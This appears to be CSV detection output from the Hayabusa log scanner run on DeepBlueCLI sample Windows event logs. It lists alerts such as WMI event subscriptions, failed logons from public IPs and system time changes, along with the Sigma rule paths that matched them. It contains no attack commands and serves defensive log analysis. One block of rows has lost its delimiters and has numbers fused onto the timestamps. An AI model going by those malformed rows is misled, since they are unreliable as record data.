2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1722013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1732013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1742013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1752013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1762013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1772013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1782013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1792013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1802013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1812013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1822013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1832013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1842013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1852013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1862013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1872013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1882013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1892013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1902013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1912013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1922013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1932013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1942013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1952013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1962013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1972013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1982013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1992013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:46:57.850 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:48:29.225 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:48:29.850 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:58:14.879 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:32:03.644 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:35:43.160 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:37:00.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:41:07.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:44:49.144 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:48:33.988 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:57:47.863 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:00:03.457 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:02:44.129 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:02:44.129 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
